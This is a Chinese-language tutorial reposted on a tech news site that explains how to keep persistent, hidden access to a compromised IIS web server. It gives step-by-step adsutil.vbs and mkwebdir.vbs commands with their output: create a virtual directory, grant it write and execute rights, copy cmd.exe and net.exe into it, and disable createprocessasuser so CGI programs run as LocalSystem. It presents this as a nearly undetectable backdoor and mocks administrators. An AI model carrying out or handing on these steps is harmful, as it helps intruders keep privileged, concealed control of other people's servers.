真正的IIS永远的后门解密

安全 数据安全
IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。

IIS是比较流行的www服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。但是80端口是不可能关闭的(如果管理员没有吃错药)。那么我们可以通过在80端口留后门,来开启永远的后门。

当IIS启动CGI应用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号,当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem的权限。

入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如338Array,或者类telnet text方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。

1. telnet到服务器

 

  1. 2. cscript.exe adsutil.vbs enum w3svc/1/root  
  2.  
  3. KeyType : (STRING) "IIsWebVirtualDir"  
  4.  
  5. AppRoot : (STRING) "/LM/W3SVC/1/ROOT"  
  6.  
  7. AppFriendlyName : (STRING) "默认应用程序"  
  8.  
  9. AppIsolated : (INTEGER) 2  
  10.  
  11. AccessRead : (BOOLEAN) True  
  12.  
  13. AccessWrite : (BOOLEAN) False  
  14.  
  15. AccessExecute : (BOOLEAN) False  
  16.  
  17. AccessScript : (BOOLEAN) True  
  18.  
  19. AccessSource : (BOOLEAN) False  
  20.  
  21. AccessNoRemoteRead : (BOOLEAN) False  
  22.  
  23. AccessNoRemoteWrite : (BOOLEAN) False  
  24.  
  25. AccessNoRemoteExecute : (BOOLEAN) False  
  26.  
  27. AccessNoRemoteScript : (BOOLEAN) False 

 

 

  1. HttpErrors : (LIST) (32 Items)  
  2.  
  3. "400,*,FILE,C:WINNThelpiisHelpcommon400.htm"  
  4.  
  5. "401,1,FILE,C:WINNThelpiisHelpcommon401-1.htm"  
  6.  
  7. "401,2,FILE,C:WINNThelpiisHelpcommon401-2.htm"  
  8.  
  9. "401,3,FILE,C:WINNThelpiisHelpcommon401-3.htm"  
  10.  
  11. "401,4,FILE,C:WINNThelpiisHelpcommon401-4.htm"  
  12.  
  13. "401,5,FILE,C:WINNThelpiisHelpcommon401-5.htm" 

 

 

  1. FrontPageWeb : (BOOLEAN) True  
  2.  
  3. Path : (STRING) "c:inetpubwwwroot"  
  4.  
  5. AccessFlags : (INTEGER) 513  
  6.  
  7. [/w3svc/1/root/localstart.asp]  
  8.  
  9. [/w3svc/1/root/_vti_pvt]  
  10.  
  11. [/w3svc/1/root/_vti_log]  
  12.  
  13. [/w3svc/1/root/_private]  
  14.  
  15. [/w3svc/1/root/_vti_txt]  
  16.  
  17. [/w3svc/1/root/_vti_script]  
  18.  
  19. [/w3svc/1/root/_vti_cnf]  
  20.  
  21. [/w3svc/1/root/_vti_bin] 

 

不要告诉我你不知道上面的输出是什么!现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了

  1. 3. mkdir c:inetpubwwwrootdir1  
  2.  
  3. 4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:inetpubwwwrootdir1" 

 

这样就建好了一个虚目录:Virtual Dir1,你可以用 1 的命令看一下

5. 接下来要改变一下Virtual Dir1的属性为execute

 

  1. cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:  
  2.  
  3. cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s: 

 

现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。 bitsCN_com

6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process

 

  1. Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false  
  2.  
  3. 注释:cscript windows script host. bitscn.com  
  4.  
  5. adsutil.vbs windows iis administration script  
  6.  
  7. 后面是 iis metabase path 

 

这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍

 

  1. "403,1,FILE,C:WINNThelpiisHelpcommon403-1.htm"  
  2.  
  3. "403,2,FILE,C:WINNThelpiisHelpcommon403-2.htm"  
  4.  
  5. "403,3,FILE,C:WINNThelpiisHelpcommon403-3.htm"  
  6.  
  7. "403,4,FILE,C:WINNThelpiisHelpcommon403-4.htm"  
  8.  
  9. "403,5,FILE,C:WINNThelpiisHelpcommon403-5.htm"  
  10.  
  11. "403,6,FILE,C:WINNThelpiisHelpcommon403-6.htm"  
  12.  
  13. "403,7,FILE,C:WINNThelpiisHelpcommon403-7.htm"  
  14.  
  15. "403,8,FILE,C:WINNThelpiisHelpcommon403-8.htm"  
  16.  
  17. "403,Array,FILE,C:WINNThelpiisHelpcommon403-Array.htm"  
  18.  
  19. "403,10,FILE,C:WINNThelpiisHelpcommon403-10.htm"  
  20.  
  21. "403,11,FILE,C:WINNThelpiisHelpcommon403-11.htm"  
  22.  
  23. "403,12,FILE,C:WINNThelpiisHelpcommon403-12.htm"  
  24.  
  25. "403,13,FILE,C:WINNThelpiisHelpcommon403-13.htm"  
  26.  
  27. "403,15,FILE,C:WINNThelpiisHelpcommon403-15.htm"  
  28.  
  29. "403,16,FILE,C:WINNThelpiisHelpcommon403-16.htm"  
  30.  
  31. "403,17,FILE,C:WINNThelpiisHelpcommon403-17.htm" "404,*,FILE,C:WINNThelpiisHelpcommon404b.htm"  
  32.  
  33. "405,*,FILE,C:WINNThelpiisHelpcommon405.htm"  
  34.  
  35. "406,*,FILE,C:WINNThelpiisHelpcommon406.htm"  
  36.  
  37. "407,*,FILE,C:WINNThelpiisHelpcommon407.htm"  
  38.  
  39. "412,*,FILE,C:WINNThelpiisHelpcommon412.htm"  
  40.  
  41. "414,*,FILE,C:WINNThelpiisHelpcommon414.htm"  
  42.  
  43. "500,12,FILE,C:WINNThelpiisHelpcommon500-12.htm"  
  44.  
  45. "500,13,FILE,C:WINNThelpiisHelpcommon500-13.htm"  
  46.  
  47. "500,15,FILE,C:WINNThelpiisHelpcommon500-15.htm"  
  48.  
  49. "500,100,URL,/iisHelp/common/500-100.asp" 

IIS的后门解密就为大家介绍完了,希望大家已经掌握。

【编辑推荐】

  1. 详细解析数据加密
  2. 内部网中的密码管理
  3. 探讨ECC加密被破译的可能性
  4. 信息安全的核心之密码技术 上
责任编辑:佚名 来源: 网络转载
相关推荐

2021-01-22 16:02:29

加密货币数字货币瑞银

2016-09-19 08:57:48

2011-11-14 13:35:25

云存储云计算

2020-02-20 10:50:30

多数人不会真正成功

2016-01-18 10:49:51

浪潮SAP

2022-07-27 11:26:56

恶意软件漏洞网络攻击

2011-02-22 13:32:03

2015-09-01 10:29:44

数据安全

2021-07-14 08:00:12

DubboRSocket 协议

2010-05-19 19:10:42

2011-11-25 15:34:33

2023-01-06 08:42:02

学习训练

2019-07-31 08:30:24

物联网电池能源

2014-11-25 09:44:43

SDN

2016-10-17 09:20:20

2010-05-12 17:09:48

2013-11-06 10:12:26

2018-01-11 09:51:34

2014-03-06 17:52:25

2010-09-29 15:20:29

点赞
收藏

51CTO技术栈公众号